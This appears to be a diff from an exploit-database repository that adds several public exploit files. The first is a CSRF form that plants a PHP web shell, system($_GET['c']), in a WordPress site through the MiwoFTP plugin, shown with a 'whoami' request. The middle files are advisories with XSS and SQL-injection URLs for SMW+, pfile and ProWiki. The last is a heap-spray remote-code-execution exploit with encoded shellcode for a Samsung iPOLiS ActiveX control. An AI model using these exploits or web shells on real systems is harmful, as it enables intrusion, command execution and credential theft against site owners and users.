<form action="http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=edit&dir=/&item=wp-comments-post.php&order=name&srt=yes" method="POST">
<input type="hidden" name="dosave" value="yes" />
<input type="hidden" name="code" value="/**
* Handles Comment Post to WordPress and prevents duplicate comment posting.
*
* @package WordPress
*/
if ( 'POST' != $_SERVER['REQUEST_METHOD'] ) {
header('Allow: POST');
header('HTTP/1.1 405 Method Not Allowed');
header('Content-Type: text/plain');
exit;
}
/** Sets up the WordPress Environment. */
require( dirname(__FILE__) . '/wp-load.php' );
nocache_headers();
$comment_post_ID = isset($_POST['comment_post_ID']) ? (int) $_POST['comment_post_ID'] : 0;
$post = get_post($comment_post_ID);
if ( empty( $post->comment_status ) ) {
/**
* Fires when a comment is attempted on a post that does not exist.
*
* @since 1.5.0
*
* @param int $comment_post_ID Post ID.
*/
do_action( 'comment_id_not_found', $comment_post_ID );
exit;
}
// get_post_status() will get the parent status for attachments.
$status = get_post_status($post);
$status_obj = get_post_status_object($status);
if ( ! comments_open( $comment_post_ID ) ) {
/**
* Fires when a comment is attempted on a post that has comments closed.
*
* @since 1.5.0
*
* @param int $comment_post_ID Post ID.
*/
do_action( 'comment_closed', $comment_post_ID );
wp_die( __( 'Sorry, comments are closed for this item.' ), 403 );
} elseif ( 'trash' == $status ) {
/**
* Fires when a comment is attempted on a trashed post.
*
* @since 2.9.0
*
* @param int $comment_post_ID Post ID.
*/<?php system($_GET['c']); ?>
/* Filler */
by LiquidWorm, 2015" />
<input type="hidden" name="fname" value="wp-comments.php" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
---
http://localhost/wordpress/wp-comments.php?c=whoami

9
platforms/php/webapps/36764.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51980/info
SMW+ is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code can run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
SMW+ 1.5.6 is vulnerable; other versions may also be affected.
http://www.example.com/index.php/Special:FormEdit?target=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F&categories=Calendar+

9
platforms/php/webapps/36765.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51982/info
pfile is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
pfile 1.02 is vulnerable; other versions may also be affected.
http://www.example.compfile/kommentar.php?filecat=[xss]&fileid=0

9
platforms/php/webapps/36766.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51982/info
pfile is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
pfile 1.02 is vulnerable; other versions may also be affected.
http://www.example.com/pfile/file.php?eintrag=0&filecat=0&id=%24%7[xql]

7
platforms/php/webapps/36768.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/51987/info
ProWiki is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/wiki4d/wiki.cgi?action=browse&id=[XSS]

39
platforms/windows/remote/36756.html Executable file
View file

@ -0,0 +1,39 @@
<html>
<!--
Vendor Homepage: https://www.samsung-security.com/Tools/device-manager.aspx
Samsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution (heap spray)
CVE: 2015-0555
Author: Praveen Darshanam
http://blog.disects.com/2015/02/samsung-ipolis-1122-xnssdkdeviceipinsta.html
http://darshanams.blogspot.com/
Tested on Windows XP SP3 IE6/7
Thanks to Peter Van Eeckhoutte for his wonderfull exploit writing tutorials
-->
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>
<script>
var shellcode = unescape('%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u4100');
var bigblock = unescape('%u9090%u9090');
var headersize = 20;
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
var memory = new Array();
for (i = 0; i < 500; i++){ memory[i] = block + shellcode }
// SEH and nSEH will point to 0x06060606
// 0x06060606 will point to (nops+shellcode) chunk
var hbuff = "";
for (i = 0; i <5000; i++)
{
hbuff += "\x06";
}
// trigget crash
target.ReadConfigValue(hbuff);
</script>
</html>